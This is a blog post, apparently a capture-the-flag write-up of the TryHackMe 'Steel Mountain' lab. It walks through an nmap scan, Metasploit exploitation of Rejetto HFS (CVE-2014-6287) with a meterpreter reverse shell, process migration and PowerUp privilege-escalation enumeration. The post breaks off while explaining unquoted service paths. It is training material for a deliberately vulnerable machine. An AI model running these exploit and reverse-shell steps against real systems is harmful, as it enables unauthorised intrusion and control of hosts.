<!doctype html>
<html lang="en-us">
  <head>
    <title>TryHackMe - Steel Mountain // FelSec - Blog</title>
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.75.1" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="FelSec" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="/css/main.min.94bc3821eb13f7352887a234ab569b1b9f21ede6c88efabc8a6cf84451b0f837.css" />

    
<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
	ga('create', 'UA-171815552-1', 'auto');
	
	ga('send', 'pageview');
}
</script>

    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="TryHackMe - Steel Mountain"/>
<meta name="twitter:description" content="Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access."/>

    <meta property="og:title" content="TryHackMe - Steel Mountain" />
<meta property="og:description" content="Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access." />
<meta property="og:type" content="article" />
<meta property="og:url" content="/posts/tryhackme-steelmountain/" />
<meta property="article:published_time" content="2020-11-07T18:57:56+01:00" />
<meta property="article:modified_time" content="2020-11-07T18:57:56+01:00" />


  </head>
  <body>
    <header class="app-header">
      <a href="/"><img class="app-header-avatar" src="/avatar.png" alt="FelSec" /></a>
      <h1>FelSec - Blog</h1>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/">Home</a>
             - 
          
          <a class="app-header-menu-item" href="/posts/">Posts</a>
             - 
          
          <a class="app-header-menu-item" href="/tags/">Tags</a>
      </nav>
      <p>Penetration Tester. Security Enthusiast. Husband. Cat Dad.</p>
      <div class="app-header-social">
        
          <a target="_blank" href="https://github.com/felsec" rel="noreferrer noopener"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg></a>
        
          <a target="_blank" href="https://twitter.com/felsec" rel="noreferrer noopener"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-twitter">
  <title>twitter</title>
  <path d="M23 3a10.9 10.9 0 0 1-3.14 1.53 4.48 4.48 0 0 0-7.86 3v1A10.66 10.66 0 0 1 3 4s-4 9 5 13a11.64 11.64 0 0 1-7 2c9 5 20 0 20-11.5a4.5 4.5 0 0 0-.08-.83A7.72 7.72 0 0 0 23 3z"></path>
</svg></a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">TryHackMe - Steel Mountain</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Nov 7, 2020
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          13 min read
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-tag">
  <title>tag</title>
  <path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7" y2="7"></line>
</svg>
              <a class="tag" href="/tags/tryhackme/">TryHackMe</a>
        </div>
      </div>
    </header>
    <div class="post-content">
      <p><strong><em>Description:</em></strong> Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.<br>
<strong><em>Created By:</em></strong> TryHackMe<br>
<strong><em>Rating:</em></strong> Easy<br>
<strong><em>Link:</em></strong> <a href="https://www.tryhackme.com/room/steelmountain">https://www.tryhackme.com/room/steelmountain</a></p>
<h2 id="information-gathering">Information Gathering</h2>
<p>Let&rsquo;s get started with this room. After doing the necessary (spinning up the host, grabbing the IP and sticking it in a file for easy reference), our first activity is to scan the host to see what services we have available to play with.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">nmap -Pn -sV -iL host -oN kenobi.nmap

Starting Nmap 7.60 ( https://nmap.org ) at 2020-07-25 14:12 BST
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 14:12 (0:00:00 remaining)
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 14:13 (0:00:26 remaining)
Nmap scan report for 10.10.29.151
Host is up (0.017s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl          Microsoft SChannel TLS
8080/tcp  open  http         HttpFileServer httpd 2.3
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3389-TCP:V=7.60%I=7%D=7/25%Time=5F1C2FE3%P=x86_64-pc-linux-gnu%r(TL
SF:SSessionReq,346,&#34;\x16\x03\x03\x03A\x02\0\0M\x03\x03_\x1c/\xdfg\xde\x99\
SF:xca\x98\xb611\[E,z\xb9\x07\xa3\x97\x80\x19\x94\xdc\xf8\x16\x02\xa1t\xd9
SF:\xaf\xce\x20\+\(\0\0\xcf\x8a\xb4ggUs\xd0\x12M\xe1\$\xd0\xce\x1a\)/\|\xb
SF:3E&amp;\x8e\x14\t\x1c\xe4\x0b\x13\0/\0\0\x05\xff\x01\0\x01\0\x0b\0\x02\xe8\
SF:0\x02\xe5\0\x02\xe20\x82\x02\xde0\x82\x01\xc6\xa0\x03\x02\x01\x02\x02\x
SF:10b\xe38\x17\xc8T\xf6\x98B\xb7T\x88\xbe\x86\x8e\x900\r\x06\t\*\x86H\x86
SF:\xf7\r\x01\x01\x05\x05\x000\x181\x160\x14\x06\x03U\x04\x03\x13\rsteelmo
SF:untain0\x1e\x17\r200724125942Z\x17\r210123125942Z0\x181\x160\x14\x06\x0
SF:3U\x04\x03\x13\rsteelmountain0\x82\x01\&#34;0\r\x06\t\*\x86H\x86\xf7\r\x01\
SF:x01\x01\x05\0\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\0\xadQ\x80
SF:\xe3\xd9G0P\xbaeNgv&gt;\xd4\xb8J\x06\xf9\x8b\x95\^V\]W9ET\xf1\xa201U\xa5\x
SF:15\xdc\x9c\x11\xc88\x13\x8e9\x07\xe7\x057&amp;G\xc1\x16U\xce\xe5\xc5C\xf1\x
SF:ed\xd3\xcf\?\xd0B\x0e&lt;\xfd\xe3\x8d\xc0\[xW\xc6\xca\xc3\xcdug\xcdM\xb3J\
SF:x20&lt;\xc5\xbf\xa7\xafE\[\xaf\xd0\xa2tLA\x04\^\xc6\0=\xc5ya\xdb\x12\|\xf0
SF:\x92\xcd\xd1_\xaf\xb2@:\xd0\xaf\xd6%\xca\x9b\x9a\x94\x1b\xa0\xf7q\xce\x
SF:b8J:\xfa\xe36\xb9\xf9\n\xc1\xa85\x9a\xaf\xb3k\xa2\xed\x1e\x1a\x0f_P\xd6
SF:,\xb2\x1a#\xfb\.\xda\x88N\xda\|\xbdq\x92\x04\x06&gt;l\(\xb8\xf5\xc0\x9d\xc
SF:c,C\x0cp\x97ig\x98\.\xfdA\x97d\x0fL\xec\xff\x9b\xa4\x93\xb8\(\xd0\x04n\
SF:xb9WG\xd0\xe9\x15\+\xa8I\x80\xc06V5\xac\x12\x88\x85k\xce\xdd\)\x08\xcah
SF:\xe7X\x169\xedZ\x82\xa5M\xff\xa9\x95&amp;0R\xe2\x1f4\x91\tK\x13\x05\x8a\xd3
SF:\x0fG\xadW\x02\x03\x01\0\x01\xa3\$0\&#34;0\x13\x06\x03U\x1d%\x04\x0c0\n\x06
SF:\x08\+\x06\x01\x05\x05\x07\x03\x010\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x0
SF:2\x0400\r\x06\t\*\x86H\x86\xf7\r\x01\x01\x05\x05\0\x03\x82\x01\x01\0M=\
SF:xbc\*jvzxW\xcb\xf0\xe4\xa6Ws\xb2\x9dr&amp;\$\^\r\xcc\xab\xa1\xe7l\xc53\xa4o
SF::uw\xb1\xe3S9\xc7\xf4\x04pt&#39;`\xdc\xfby\x82\xfd\xf6\xf5\xbc\(\x1a\xfaA\x
SF:e6P&amp;Z\x82%p3\x17\x80\xee\xcf\xe3\x8d!\x91{\xce\x91\xad\xd3\x9a50\xe9\xe
SF:7\x20\nl\x97\xd7\x0c\xf74\n%\x88W\xc4\xc4\xed\x95\xc8\xa3\t\xb0\x7f\x8b
SF:\xea/\xab\xd2F\x7f`CV\x18p\x91#f\xb5@\xb8\xc0\xfb7\xb0\xab%\xa5\x83\xfe
SF:\xebM\)\xef\xd1\x95&gt;\x11Avt\xe0\xe9\x06\xcb\xa5x\xce\x12\xa3G6&gt;P,;\xa8\
SF:x84\xd9\xb6\xd6\xc2\x08\xa7}_\xb6\?\x11\x8d\xf7\xf0_\xec\xa8c7\x80p\xc1
SF:\xfc\x08L\x17\x98\x0b\t\x1a\x7f\xe3\xd7\xb1\xae\xfb\x8f\xa0\xc3v\&#34;\xd6\
SF:x924J\x05\x9a\x95\xdcBO\xe6\xc7\xa7\x20\xf5\xb2S\x8a\$\x08\xe0\x90\xcd\
SF:x81~l\x82\xb4\x97\x02\xa4&lt;\xa3L3\xeco\x13c\xa1\xff2r\xd0\xf8s\x0f\xf3\x
SF:a1KR8\xfcf=n\x0e\0\0\0&#34;);
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.73 seconds
</code></pre></div><p>Looking at the nmap output we can see that we have about 12 services open to us, the output also tells us that this is a Windows server.</p>
<p>Let&rsquo;s open up the website on port 80 in a browser and see what we find&hellip;</p>
<p><img src="/posts/sm/1-webpage.png" alt="Steel Mountain Website - Bill Harper"></p>
<p>An intersting page, but it just looks like an Employee of the Month. Looking at the source code for the page we can see that the guy in the image is Bill Harper.</p>
<p><img src="/posts/sm/2-webpage-source.png" alt="Steel Mountain Website - Source"></p>
<h2 id="initial-access">Initial Access</h2>
<p>Going back to our nmap output we can see that there is another web service running on port 8080. Looking at the service information and connecting to the port in a browser allows us to identify the service as a HTTP File Server developed by the company Rejetto. More information can be found <a href="https://www.rejetto.com/hfs/" title="Rejetto HTTP File Sever">here</a>.</p>
<p><img src="/posts/sm/3-hfs-homepage.png" alt="Steel Mountain HFS Homepage"></p>
<p>After grabbing the version from the webpage and doing a bit of searching, we find that the service is vulnerable to a number of issues including a couple of Remote Code Execution flaws.</p>
<p>One particular flaw we are interested in is CVE-2014-6287. The flaw exists within a parser library (ParserLib.pas) used by the application that does not adequately sanitise user input before passing it to a regeular expression function.</p>
<pre><code class="language-vbs" data-lang="vbs">function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
</code></pre><p>By sending a null (%00) character within a search string it is possible to stop the regex function from parsing the input and instead allowing the macro to execute the arbitrary code.</p>
<p>Using this we can get a remote shell on the server. We will use Metasploit to make it easier this time, but there are other ways of doing it.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">msf5 &gt; search rejetto

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


msf5 &gt; use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) &gt; options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax &#39;file:&lt;path&gt;&#39;
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: &#39;&#39;, seh, thread, process, none)
   LHOST     192.168.1.114    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/http/rejetto_hfs_exec) &gt; set LHOST tun0
LHOST =&gt; tun0
msf5 exploit(windows/http/rejetto_hfs_exec) &gt; options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax &#39;file:&lt;path&gt;&#39;
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: &#39;&#39;, seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/http/rejetto_hfs_exec) &gt; set RHOSTS 10.10.29.$IP
RHOSTS =&gt; $IP
msf5 exploit(windows/http/rejetto_hfs_exec) &gt; options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     $IP              yes       The target host(s), range CIDR identifier, or hosts file with syntax &#39;file:&lt;path&gt;&#39;
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: &#39;&#39;, seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/http/rejetto_hfs_exec) &gt; options set RHOSTS $IP10.10.29.151
RHOSTS =&gt; 10.10.29.151
msf5 exploit(windows/http/rejetto_hfs_exec) &gt; set RPORT 8080
RPORT =&gt; 8080
msf5 exploit(windows/http/rejetto_hfs_exec) &gt; exploit

[*] Started reverse TCP handler on 10.8.7.19:4444
[*] Using URL: http://0.0.0.0:8080/6q6f8cxkkYZZ1Bf
[*] Local IP: http://10.8.7.19:8080/6q6f8cxkkYZZ1Bf
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /6q6f8cxkkYZZ1Bf
[*] Sending stage (176195 bytes) to 10.10.29.151
[*] Meterpreter session 1 opened (10.8.7.19:4444 -&gt; 10.10.29.151:49403) at 2020-07-25 14:33:52 +0100
[!] Tried to delete %TEMP%\uZSLPzm.vbs, unknown result
[*] Server stopped.

meterpreter &gt; sysinfo
Computer        : STEELMOUNTAIN
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter &gt;
</code></pre></div><p>Fantastic! We now have a remote shell on the server as a standard user.</p>
<p>Next, we need to migrate the Meterpreter session to a different service. With us having low privileges we cannot migrate to one of the usual processes (winlogon, lsass, etc.) so instead we will have to use a lower privilege service, such as explorer.exe.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">meterpreter &gt; migrate
Usage: migrate &lt;&lt;pid&gt; | -P &lt;pid&gt; | -N &lt;name&gt;&gt; [-t timeout]

Migrates the server instance to another process.
NOTE: Any open channels or other dynamic state will be lost.

meterpreter &gt; ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                Path
 ---   ----  ----                  ----  -------  ----                ----
 0     0     [System Process]
 4     0     System
 360   4     smss.exe
 484   640   svchost.exe
 492   484   csrss.exe
 544   536   csrss.exe
 552   484   wininit.exe
 580   536   winlogon.exe
 640   552   services.exe
 648   552   lsass.exe                                                
 704   640   svchost.exe                                              
 732   640   svchost.exe                                              
 824   640   ASCService.exe                                           
 836   580   dwm.exe                                                  
 940   640   svchost.exe                                              
 980   640   svchost.exe                                              
 1004  640   svchost.exe                                              
 1044  640   svchost.exe                                              
 1116  640   svchost.exe                                              
 1208  640   spoolsv.exe                                              
 1232  640   amazon-ssm-agent.exe                                     
 1300  640   svchost.exe                                              
 1324  640   LiteAgent.exe                                            
 1440  1820  pteebwGfDNKEv.exe     x86   1        STEELMOUNTAIN\bill  C:\Users\bill\AppData\Local\Temp\1\rad33352.tmp\pteebwGfDNKEv.exe
 1448  640   LiveUpdate.exe                                           
 1500  640   svchost.exe                                              
 1520  640   svchost.exe                                              
 1568  640   wlms.exe                                                 
 1656  640   Ec2Config.exe                                            
 1820  2436  wscript.exe           x86   1        STEELMOUNTAIN\bill  C:\Windows\SysWOW64\wscript.exe
 1840  704   SppExtComObj.Exe                                         
 1896  1440  cmd.exe               x86   1        STEELMOUNTAIN\bill  C:\Windows\SysWOW64\cmd.exe
 1932  640   sppsvc.exe                                               
 2020  1896  conhost.exe           x64   1        STEELMOUNTAIN\bill  C:\Windows\System32\conhost.exe
 2028  640   svchost.exe                                              
 2168  1520  w3wp.exe                                                 
 2388  704   WmiPrvSE.exe                                             
 2436  2680  hfs.exe               x86   1        STEELMOUNTAIN\bill  C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hfs.exe
 2608  980   taskhostex.exe        x64   1        STEELMOUNTAIN\bill  C:\Windows\System32\taskhostex.exe
 2680  2640  explorer.exe          x64   1        STEELMOUNTAIN\bill  C:\Windows\explorer.exe
 2860  640   msdtc.exe

meterpreter &gt; migrate -N explorer.exe
[*] Migrating from 1440 to 2680...
[*] Migration completed successfully.
meterpreter &gt;
</code></pre></div><p>Done! Now we can safely grab the user flag and look to elevate our privileges.</p>
<h2 id="privilege-escalation">Privilege Escalation</h2>
<p>Since we know that the server we are attacking is a Windows host, we can make use of PowerShell post exploitation frameworks and modules to enumerate more information about the host and identify abnormalities. In particular we will be using the PowerUp module that comes as part of the PowerSploit post exploitation framework.</p>
<p>The PowerUp script performs a number of checks on the target to identify any weaknesses or misconfigurations that would allow the user to elevate their permissions. An alternative tool we can use is the winpeas script (EXE or Batch) to perform the privilege escalation checks.</p>
<p>We will need to grab a copy of the script, which can be donwloaded from the PowerSploit github repository, upload it to the server and load the PowerShell into our Meterpreter session. This allows us to use PowerShell based shells on the target.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">meterpreter &gt; cd %DESKTOP%
meterpreter &gt; pwd
C:\Users\bill\Desktop
meterpreter &gt; upload /opt/tools/postexploitation/PowerSploit/Privesc/PowerUp.ps1
[*] uploading  : /opt/tools/postexploitation/PowerSploit/Privesc/PowerUp.ps1 -&gt; PowerUp.ps1
[*] Uploaded 549.65 KiB of 549.65 KiB (100.0%): /opt/tools/postexploitation/PowerSploit/Privesc/PowerUp.ps1 -&gt; PowerUp.ps1
[*] uploaded   : /opt/tools/postexploitation/PowerSploit/Privesc/PowerUp.ps1 -&gt; PowerUp.ps1
meterpreter &gt; load powershell
Loading extension powershell...Success.
meterpreter &gt; powershell_shell
PS&gt;
</code></pre></div><p>Within this PowerShell prompt we can execute the script, call the <code>Invoke-AllChecks</code> function and wait to see what information is returned.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">PS&gt; . .\PowerUp.ps1
PS&gt; Invoke-AllChecks

[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...

[*] Checking for unquoted service paths...

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name &#39;AdvancedSystemCareService9&#39; -Path &lt;HijackPath&gt;
CanRestart     : True

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name &#39;AdvancedSystemCareService9&#39; -Path &lt;HijackPath&gt;
CanRestart     : True

ServiceName    : AWSLiteAgent
Path           : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name &#39;AWSLiteAgent&#39; -Path &lt;HijackPath&gt;
CanRestart     : False

ServiceName    : AWSLiteAgent
Path           : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name &#39;AWSLiteAgent&#39; -Path &lt;HijackPath&gt;
CanRestart     : False

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name &#39;IObitUnSvr&#39; -Path &lt;HijackPath&gt;
CanRestart     : False

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name &#39;IObitUnSvr&#39; -Path &lt;HijackPath&gt;
CanRestart     : False

ServiceName    : LiveUpdateSvc
Path           : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name &#39;LiveUpdateSvc&#39; -Path &lt;HijackPath&gt;
CanRestart     : False

ServiceName    : LiveUpdateSvc
Path           : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name &#39;LiveUpdateSvc&#39; -Path &lt;HijackPath&gt;
CanRestart     : False

[*] Checking service executable and argument permissions...

ServiceName                     : AdvancedSystemCareService9
Path                            : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name &#39;AdvancedSystemCareService9&#39;
CanRestart                      : True

ServiceName                     : IObitUnSvr
Path                            : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name &#39;IObitUnSvr&#39;
CanRestart                      : False

ServiceName                     : LiveUpdateSvc
Path                            : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name &#39;LiveUpdateSvc&#39;
CanRestart                      : False

[*] Checking service permissions...

[*] Checking %PATH% for potentially hijackable DLL locations...

[*] Checking for AlwaysInstallElevated registry key...

[*] Checking for Autologon credentials in registry...

[*] Checking for modifidable registry autoruns and configs...

[*] Checking for modifiable schtask files/configs...

[*] Checking for unattended install files...

[*] Checking for encrypted web.config strings...

[*] Checking for encrypted application pool and virtual directory passwords...

[*] Checking for plaintext passwords in McAfee SiteList.xml files....

[*] Checking for cached Group Policy Preferences .xml files....
</code></pre></div><p>Looking at the output we can see a few services and binaries that could allow us to elevate our permissions, however there is one key service (AdvancedSystemCareService9) that looks more promising compared to the rest because:</p>
<ol>
<li>It is vulnerable to a Unquoted Service Path flaw <code>Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe</code></li>
<li>We can restart the service <code>CanRestart : True</code></li>
<li>We have write permissions within the services file path, specifically <code>C:\Program Files (x86)\IObit\</code></li>
</ol>
<p>Let&rsquo;s take a moment and understand what the Unquoted Service Path flaw is.</p>
<p>In short, the unquoted service paths issue is where the path to the executable file for a service contains one or more whitespace characters without being encased in quotes. OK, so what?!</p>
<p>Well, due to the way in which Windows handles file paths when launching programs it treats any space as a break and any items following the space as arguements. If the executable file is not found, the file path is re-analysed up to the next space and the process is repeated.</p>
<p>So for our example above the processing order would be:</p>
<ol>
<li>C:\Program.exe</li>
<li>C:\Program Files.exe</li>
<li>C:\Program Files (x86)\IObit\Advanced.exe</li>
<li>C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe</li>
</ol>
